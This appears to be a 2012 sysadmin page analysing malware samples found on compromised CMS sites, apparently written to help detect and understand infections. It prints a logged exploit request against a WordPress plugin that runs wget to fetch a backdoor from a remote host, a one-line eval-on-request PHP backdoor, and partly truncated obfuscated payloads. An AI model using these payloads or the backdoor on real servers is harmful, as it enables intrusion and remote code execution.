Malware in CMS based sites

Sample 1

Infected files start with a very long line:

<?php
$str=base64_decode('ZXJyb3JfcmVwb3J0 [...] KfQ==');
?>

which decodes to another php code, also with a base64 encoded string:

<?php
echo(base64_decode('PHNjcmlwdD5oPS1wYXJzZUl [...] Y3JpcHQ+'));
?>

which decodes to an obfuscated JavaScript:

<script>h=-parseInt('012')/5 [...] n="3.5@3.5@51.5@50@15 [...] +q)</script>

which turns into some html code which tries to load http://mtyndtyudnzst6ymu87u.rr.nu/?go=2

According to another reports this kind of URLs lead to a "rogueware" site, today this particular domain is expired

This infection came from a backdoor installed in another virtual host in the same server

Sample 2

Logs in the http server show attacking site sending this:

GET /.../wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgaXNfaHVtYW5fY2xhc3MucGhwJyk7));error HTTP/1.1

which translates into:

passthru('wget http://troll.hr00.ru/sh.txt; mv sh.txt sh.php');

that means it tries to downlad a backdoor php code

This sample attack tries to exploit a vulnerable "is-human" wordpress plugin

Sample 3

Logs in the http server show attacking site sending this:

"GET /[random existing directory]/url(data:image/png;base64,iVBORw0KGgoA [...] RK5CYII%3d) HTTP/1.1"

This base64 code translates to this real image file:

Doesn't seem to be an exploit, but makes no sense to me.

Sample 4

-rw-r--r--   1 webservd webservd    1026 Apr  2 08:18 ibqmfxq.php

After decoding twice base64, you get

if(isset($_REQUEST['a'.'sc']))eval(stripslashes($_REQUEST['a'.'sc'])/*M8K@\.*/);

That means, if you access your site as http://example.com/ibqmfxq.php?asc=[some string], you can execute code with webservd permissions.

In the server logs, you can see lots of accesses from different addresses to this backdoor, always using "POST" method, so you can't see the code actually executed.

Anyway logs show errors from this code: trying to remove files from /tmp, download files using wget/curl/fetch/lwp-download, using perl script "z"...

There is coincidence between last access to this backdoor and last mass infection of index.php files

This site was running Drupal 5.7 (a vulnerable 2008 version)

Sample 5

Infected html files with obfuscated javascript

<script>h=-parseInt('012')/5 [...] n="3.5@3.5@51.5@50@15 [...] +q)</script>

External resources

Mass injection of wordpress sites (Mar. 2012)
Some stats
Backdoor script finder Warning: searches only PHP files.

Last Modified: April 20, 2012